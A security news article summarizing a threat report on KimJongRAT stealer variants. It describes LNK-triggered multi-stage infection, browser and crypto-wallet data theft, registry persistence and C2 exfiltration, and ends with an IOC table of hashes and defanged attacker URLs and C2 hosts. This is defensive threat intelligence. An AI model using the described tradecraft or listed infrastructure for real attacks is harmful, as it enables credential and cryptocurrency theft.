A new wave of KimJongRAT stealer variants has been identified, showcasing advanced delivery, persistence, and information theft techniques.
Both PE and PowerShell-based versions were observed, with attack chains initiated via malicious Windows shortcut (LNK) files.
Upon user interaction, these LNK files trigger the download and execution of multi-stage payloads from attacker-controlled content delivery networks (CDNs), leveraging legitimate services to evade detection.
Technical Details of the PE Variant Chain
The PE variant utilizes a staged approach. The attack commences when a victim opens a weaponized .LNK file, which, using Windows utilities such as cmd.exe and curl.exe, downloads a disguised HTML Application (HTA) file from a legitimate CDN provider.
The HTA file, embedded with obfuscated VBS code, drops three files: a decoy PDF, a text file with payload URLs, and a 64-bit DLL loader.
The loader, named sys.dll, executes further file retrieval using RC4-encrypted payloads specified in the text file, ultimately deploying stealer and orchestrator components (net64.log and main64.log).
These components implement extensive reconnaissance and exfiltration capabilities, including browser data, system information, email and FTP credentials, and files of interest (such as cryptocurrency wallet data).
The orchestrator communicates with the attacker’s command and control (C2) infrastructure, uploading compressed and XOR-encrypted archives of stolen data, and supporting further attacker commands via HTTP POST and GET requests.
Custom encoding and encryption routines obscure both strings and data, complicating analysis and detection.
For instance, API call strings are encoded using a substitution cipher, and exfiltrated archives are XORed prior to network transmission.
PowerShell Variant
The PowerShell variant mirrors the overall execution flow of the PE version but relies on an embedded ZIP archive containing a PowerShell stealer and a VBS persistence script.
Upon execution, the dropper opens a decoy PDF, extracts the ZIP archive, and runs the main PowerShell script.
According to Unit42 Report, this script performs anti-VM checks, establishes persistence via registry keys, and collects exhaustive system and browser data.
Particularly notable in the PowerShell stealer is its focus on cryptocurrency assets. The script parses the directories of popular browsers (Chrome, Edge, Naver Whale, Firefox) to extract credentials, cookies, and sensitive files.
It systematically searches for browser extensions associated with cryptocurrency wallets such as MetaMask, Trust Wallet, TronLink, and others copying extension data and configuration files for exfiltration.
All harvested content is compressed and uploaded to the attacker’s C2 using chunked HTTP POSTs.
The persistent VBS script ensures the stealer is automatically executed at user logon, maintaining continuous access for the threat actor.
The backdoor component of the PowerShell variant facilitates subsequent data theft and remote command execution, supporting both file uploads and downloads, additional malware deployment, and interactive command execution.
Since its first description in 2013 and subsequent evolutions, KimJongRAT demonstrates a continuous adaptation to evade defenses and maximize payload impact.
Its multi-file, multi-stage structure, blending native Windows tools, obfuscated scripts, and legitimate Internet services, presents detection and response challenges.
The enhanced focus on cryptocurrency theft signals alignment with broader cybercriminal monetization trends.
Security vendors, including Palo Alto Networks, have updated detection logic to track these evolving threats.
Protection strategies recommended include advanced behavioral monitoring, URL and DNS filtering, and regular incident response exercises.
Organizations should remain vigilant for unusual LNK file activity and unknown outbound connections to suspicious CDNs or dynamic DNS services.
Indicators of Compromise (IOCs)
| Indicator Type | Value/Description |
|---|---|
| Initial LNK SHA256 | a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189 (and others) |
| First Stage HTA SHA256 | 02783530bbd8416ebc82ab1eb5bbe81d5d87731d24c6ff6a8e12139a5fe33cee (and others) |
| Second Stage Loader SHA256 | f4d9547269e0cd7a0df97e394f688e0eb00b31965abd5e6ad67d373a7dc58f3b (and others) |
| Orchestrator SHA256 | 85be5cc01f0e0127a26dceba76571a94335d00d490e5391ccef72e115c3301b3 (and others) |
| KimJongRAT Stealer SHA256 | 96df4f9cb5d9cacd6e3b947c61af9b8317194b1285936ce103f155e082290381 (and others) |
| PowerShell Loader SHA256 | 97d1bd607b4dc00c356dd873cd4ac309e98f2bb17ae9a6791fc0a88bc056195a |
| PowerShell Stealer SHA256 | b103190c647ddd7d16766ee5af19e265f0e15d57e91a07b2a866f5b18178581c |
| PowerShell Keylogger SHA256 | 3c6476411d214d40d0cc43241f63e933f5a77991939de158df40d84d04b7aa78 |
| Persistence VBS File SHA256 | f73164bd4d2a475f79fb7d0806cfc3ddb510015f9161e7dce537d90956c11393 |
| Attacker CDN URLs | cdn.glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/, cdn.glitch[.]global/17443dac-272c-421c-80ac-… |
| C2 Servers | 131.153.13[.]235/sp/, secservice.ddns[.]net/service2/, srvdown.ddns[.]net/service3/ |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
